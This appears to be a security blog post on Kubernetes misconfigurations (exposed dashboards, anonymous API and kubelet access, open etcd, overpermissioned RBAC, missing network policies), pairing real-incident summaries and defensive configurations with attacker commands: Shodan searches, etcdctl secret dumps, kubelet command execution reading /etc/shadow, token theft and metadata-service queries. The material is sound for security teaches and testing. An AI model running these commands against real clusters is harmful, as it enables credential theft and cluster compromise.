Kubernetes has become the de facto standard for container orchestration, powering everything from startups to Fortune 500 infrastructure. But with great power comes great complexity—and that complexity breeds misconfiguration. The NSA and CISA have explicitly warned that "Kubernetes is commonly targeted for three reasons: data theft, computational power theft, or denial of service."
This post examines the misconfigurations that have enabled real-world breaches, providing both offensive techniques for penetration testers and defensive guidance for security teams.
The Kubernetes Attack Surface
Before diving into specific misconfigurations, it's important to understand what attackers target in Kubernetes environments:
- Control Plane Components: API Server, etcd, Controller Manager, Scheduler
- Node Components: Kubelet, Container Runtime, kube-proxy
- Workloads: Pods, Deployments, Services, Secrets
- Network: Inter-pod communication, Ingress, Service Mesh
- Supply Chain: Container images, Helm charts, Operators
Compromise at any layer can cascade. A misconfigured RBAC policy might allow a compromised pod to read Secrets across namespaces; an exposed API server might grant unauthenticated cluster-admin access.
Exposed Kubernetes Dashboard
Tesla Cryptojacking Incident (2018)
Attackers discovered Tesla's Kubernetes dashboard was exposed to the internet without authentication. They deployed cryptocurrency miners and accessed AWS credentials stored in environment variables, gaining broader cloud access.
The Kubernetes Dashboard provides a web UI for cluster management. When exposed without authentication—a surprisingly common configuration—it grants attackers visual access to the entire cluster.
Finding Exposed Dashboards
# Shodan search for Kubernetes dashboards
shodan search "kubernetes-dashboard" "port:443"
# Common dashboard paths
https://target:443/api/v1/namespaces/kubernetes-dashboard/services/https:kubernetes-dashboard:/proxy/
https://target:8443/
# Default ports
# 8443 - Dashboard HTTPS
# 30000-32767 - NodePort range (dashboard often exposed here)
Exploitation
An unauthenticated dashboard allows:
- Viewing all namespaces, pods, secrets, and configurations
- Creating new workloads (including privileged pods)
- Executing commands in running containers
- Downloading secrets and configmaps
Defense
- Never expose the dashboard publicly
- Require authentication (OIDC, token-based)
- Use
kubectl proxyfor local access instead - Apply network policies restricting dashboard access
- Consider removing the dashboard entirely in production
Anonymous Authentication to API Server
Multiple Cryptojacking Campaigns (2018-Present)
Researchers have repeatedly discovered thousands of Kubernetes clusters with anonymous authentication enabled, allowing anyone to query the API server. Attackers use automated scanners to find these clusters and deploy miners within minutes of discovery.
By default, Kubernetes API server allows anonymous requests, assigning them to the system:anonymous user. If RBAC isn't properly configured, this anonymous user may have dangerous permissions.
Testing for Anonymous Access
# Check if anonymous auth is allowed
curl -k https://target:6443/api/v1/namespaces
# Check specific resources
curl -k https://target:6443/api/v1/secrets
curl -k https://target:6443/api/v1/pods
# Check permissions
curl -k https://target:6443/apis/authorization.k8s.io/v1/selfsubjectaccessreviews \
-X POST -H "Content-Type: application/json" \
-d '{"apiVersion":"authorization.k8s.io/v1","kind":"SelfSubjectAccessReview","spec":{"resourceAttributes":{"verb":"list","resource":"secrets"}}}'
Common Dangerous Configurations
# DANGEROUS: Grants anonymous users cluster-admin
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: anonymous-admin
subjects:
- kind: User
name: system:anonymous
roleRef:
kind: ClusterRole
name: cluster-admin
apiGroup: rbac.authorization.k8s.io
Defense
# Disable anonymous auth in API server flags
--anonymous-auth=false
# Or ensure anonymous user has no permissions (default in modern K8s)
# Review RBAC bindings for system:anonymous and system:unauthenticated
Exposed etcd
Shopify Bug Bounty (2019)
A researcher discovered Shopify's internal Kubernetes cluster had etcd accessible from certain network positions. Etcd contained all cluster secrets, including database credentials and API keys. The issue was reported through their bug bounty program.
Etcd is Kubernetes' brain—it stores all cluster state, including Secrets (often base64 encoded but not encrypted). Direct etcd access bypasses all Kubernetes authentication and authorization.
Finding Exposed etcd
# Default etcd ports
# 2379 - Client communication
# 2380 - Peer communication
# Shodan search
shodan search "etcd" "port:2379"
# Test connectivity
curl http://target:2379/v2/keys
etcdctl --endpoints=http://target:2379 get / --prefix --keys-only
Extracting Secrets
# List all keys
etcdctl --endpoints=http://target:2379 get / --prefix --keys-only
# Get Kubernetes secrets
etcdctl --endpoints=http://target:2379 get /registry/secrets --prefix
# Secrets are stored at paths like:
# /registry/secrets/default/my-secret
# /registry/secrets/kube-system/admin-token
Defense
- Require TLS client certificates for etcd access
- Never expose etcd outside the control plane network
- Enable etcd encryption at rest for secrets
- Use network policies/firewalls to restrict etcd access to API server only
# Enable encryption at rest
apiVersion: apiserver.config.k8s.io/v1
kind: EncryptionConfiguration
resources:
- resources:
- secrets
providers:
- aescbc:
keys:
- name: key1
secret: <base64-encoded-key>
- identity: {}
Overpermissioned RBAC
Microsoft Azure Security Research (2021)
Researchers demonstrated how a single pod with permission to create RoleBindings could escalate to cluster-admin by binding itself to the cluster-admin ClusterRole. This pattern appears frequently in real environments.
RBAC misconfigurations are endemic in Kubernetes. The complexity of roles, cluster roles, bindings, and service accounts leads to overpermissioned configurations that enable privilege escalation.
Dangerous RBAC Patterns
Wildcard Permissions
# DANGEROUS: Grants all permissions
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: too-permissive
rules:
- apiGroups: ["*"]
resources: ["*"]
verbs: ["*"]
Escalation via bind/escalate
# If a role can bind roles, it can grant itself any permission
rules:
- apiGroups: ["rbac.authorization.k8s.io"]
resources: ["rolebindings", "clusterrolebindings"]
verbs: ["create", "bind"]
# Or escalate existing roles
- apiGroups: ["rbac.authorization.k8s.io"]
resources: ["roles", "clusterroles"]
verbs: ["escalate"]
Pod Creation with Service Account Control
# Creating pods + controlling service accounts = privilege escalation
# Attacker creates pod with highly privileged service account
rules:
- apiGroups: [""]
resources: ["pods"]
verbs: ["create"]
- apiGroups: [""]
resources: ["serviceaccounts"]
verbs: ["get", "list"]
Auditing RBAC
# List all cluster role bindings
kubectl get clusterrolebindings -o wide
# Find overpermissioned roles
kubectl get clusterroles -o json | jq '.items[] | select(.rules[].verbs[] == "*")'
# Check what a service account can do
kubectl auth can-i --list --as=system:serviceaccount:default:my-sa
# Tools for RBAC analysis
# - rbac-lookup
# - kubectl-who-can
# - rakkess
Defense
- Follow least privilege—grant only necessary permissions
- Avoid wildcards in RBAC rules
- Be cautious with bind, escalate, impersonate verbs
- Regularly audit RBAC with automated tools
- Use namespace isolation to limit blast radius
Exposed Kubelet API
Hildegard Malware Campaign (2021)
The Hildegard malware specifically targeted exposed Kubelet APIs to deploy cryptominers. It scanned for kubelets listening on port 10250 without authentication and used them to execute commands in containers across the cluster.
Every Kubernetes node runs a Kubelet that manages pods on that node. The Kubelet API (port 10250) allows pod management and command execution. When exposed without authentication, it's a direct path to container compromise.
Finding Exposed Kubelets
# Default Kubelet ports
# 10250 - HTTPS API
# 10255 - Read-only HTTP (deprecated but sometimes enabled)
# Check for anonymous access
curl -k https://target:10250/pods
# List running pods
curl -k https://target:10250/runningpods/
Exploitation
# Execute commands in a container
curl -k https://target:10250/run/<namespace>/<pod>/<container> \
-X POST -d "cmd=id"
# Example: Run in kube-system namespace
curl -k https://target:10250/run/kube-system/coredns-5644d7b6d9-xxxxx/coredns \
-X POST -d "cmd=cat /etc/shadow"
# Get container logs
curl -k https://target:10250/containerLogs/<namespace>/<pod>/<container>
Defense
# Kubelet configuration (kubelet-config.yaml)
authentication:
anonymous:
enabled: false
webhook:
enabled: true
authorization:
mode: Webhook
# Command line flags
--anonymous-auth=false
--authorization-mode=Webhook
Secrets Mismanagement
Kubernetes Secrets are base64 encoded by default—not encrypted. This leads to multiple exposure vectors:
Secrets in Environment Variables
# Common but problematic pattern
env:
- name: DB_PASSWORD
valueFrom:
secretKeyRef:
name: db-creds
key: password
# Environment variables are visible in:
# - /proc/<pid>/environ
# - Container runtime inspection
# - Log aggregation (if env vars are logged)
# - Child processes
Secrets Mounted as Files
Mounting secrets as files is safer but still requires proper permissions:
volumeMounts:
- name: secret-volume
mountPath: /etc/secrets
readOnly: true
volumes:
- name: secret-volume
secret:
secretName: my-secret
defaultMode: 0400 # Restrict file permissions
Extracting Secrets
# If you have list secrets permission
kubectl get secrets -A -o json | jq '.items[].data'
# Decode base64
kubectl get secret my-secret -o jsonpath='{.data.password}' | base64 -d
# From within a compromised pod
cat /var/run/secrets/kubernetes.io/serviceaccount/token
ls /etc/secrets/
Defense
- Enable encryption at rest for Secrets
- Use external secrets management (HashiCorp Vault, AWS Secrets Manager)
- Mount secrets as files, not environment variables
- Restrict secret access via RBAC
- Rotate secrets regularly
- Consider secrets-store-csi-driver for external secret providers
Missing Network Policies
Various Cryptojacking Campaigns (Ongoing)
Once attackers compromise a single pod, the absence of network policies allows them to scan the internal network, access other services, reach the metadata service (cloud environments), and communicate with C2 infrastructure without restriction.
By default, Kubernetes allows all pod-to-pod communication. Without network policies, a compromised pod can reach any other pod in the cluster.
Demonstrating the Risk
# From a compromised pod, scan the cluster network
# Install nmap (if possible)
apt update && apt install -y nmap
# Scan for other services
nmap -sT 10.0.0.0/8 -p 80,443,3306,5432,6379,27017
# Access cloud metadata
curl http://169.254.169.254/latest/meta-data/
# Reach Kubernetes API
curl -k https://kubernetes.default.svc/api/v1/namespaces
Implementing Network Policies
# Default deny all ingress
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: default-deny-ingress
namespace: production
spec:
podSelector: {}
policyTypes:
- Ingress
# Allow specific traffic
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: allow-frontend-to-backend
namespace: production
spec:
podSelector:
matchLabels:
app: backend
policyTypes:
- Ingress
ingress:
- from:
- podSelector:
matchLabels:
app: frontend
ports:
- protocol: TCP
port: 8080
Defense
- Implement default-deny network policies in all namespaces
- Explicitly allow only required traffic
- Block metadata service access (169.254.169.254) from pods
- Use a CNI that supports network policies (Calico, Cilium, Weave)
- Consider service mesh for mTLS between services
Privileged Containers and Host Access
We covered container escapes in detail in our previous post, but it's worth emphasizing how often we find these in Kubernetes environments:
Common Dangerous Configurations
# Privileged container
securityContext:
privileged: true
# Host namespaces
hostNetwork: true
hostPID: true
hostIPC: true
# Dangerous volume mounts
volumes:
- name: docker-sock
hostPath:
path: /var/run/docker.sock
- name: host-root
hostPath:
path: /
Defense: Pod Security Standards
Kubernetes provides Pod Security Standards (replacing PodSecurityPolicy) to enforce security constraints:
# Enforce restricted policy on namespace
kubectl label namespace production \
pod-security.kubernetes.io/enforce=restricted \
pod-security.kubernetes.io/warn=restricted \
pod-security.kubernetes.io/audit=restricted
The "restricted" policy prevents:
- Privileged containers
- Host namespace sharing
- Dangerous volume types
- Root user containers
- Privilege escalation
Supply Chain Attacks
Codecov Supply Chain Attack (2021)
While not Kubernetes-specific, the Codecov attack demonstrated how compromised container images and CI/CD tools can propagate through Kubernetes deployments. Attackers modified a bash script that was pulled during container builds, extracting environment variables (including Kubernetes credentials) from CI/CD pipelines.
Image Security Risks
- Pulling images from untrusted registries
- Using
latesttags instead of specific versions - Not scanning images for vulnerabilities
- Not verifying image signatures
Defense
# Restrict image sources with admission controllers
apiVersion: admissionregistration.k8s.io/v1
kind: ValidatingWebhookConfiguration
# ... configure to only allow images from trusted registries
# Use image digest instead of tags
image: myregistry.com/myapp@sha256:abc123...
# Enable image signature verification with Sigstore/cosign
# Configure in admission controller policy
Kubernetes Security Checklist
Based on the misconfigurations we've covered, here's a condensed security checklist:
API Server
- Disable anonymous authentication or ensure no RBAC permissions for anonymous
- Enable audit logging
- Use TLS for all API communication
- Restrict API server network access
etcd
- Require TLS client certificates
- Enable encryption at rest
- Restrict network access to control plane only
Kubelet
- Disable anonymous authentication
- Enable webhook authorization
- Restrict network access
RBAC
- Follow least privilege
- No wildcards in production roles
- Audit regularly
- Restrict bind/escalate/impersonate verbs
Workloads
- Enforce Pod Security Standards
- No privileged containers
- No host namespace sharing
- Read-only root filesystem
- Run as non-root
Network
- Implement default-deny network policies
- Block metadata service access
- Use TLS for service communication
Secrets
- Enable encryption at rest
- Use external secrets management
- Mount as files, not environment variables
- Restrict access via RBAC
Conclusion
Kubernetes security failures rarely stem from sophisticated attacks. They result from misconfigurations that provide excessive access—exposed dashboards, anonymous authentication, overpermissioned RBAC, and missing network policies. These issues persist because Kubernetes prioritizes functionality over security by default, and because its complexity makes secure configuration challenging.
The breaches we've examined share common patterns: attackers find exposed management interfaces, leverage overpermissioned service accounts, or exploit the absence of network segmentation. Each of these is preventable with proper configuration.
For organizations running Kubernetes, security must be proactive. Regular audits, automated policy enforcement, and defense-in-depth are essential. For penetration testers, understanding these misconfigurations provides reliable paths through even well-defended environments—because somewhere, someone forgot to disable anonymous authentication.
- Kubernetes Documentation - Official docs and security guides
- Trivy - Vulnerability scanner for containers and K8s
- kube-bench - CIS Kubernetes Benchmark checks
- Falco - Runtime security monitoring
- KubiScan - RBAC security scanning
- kube-hunter - Kubernetes penetration testing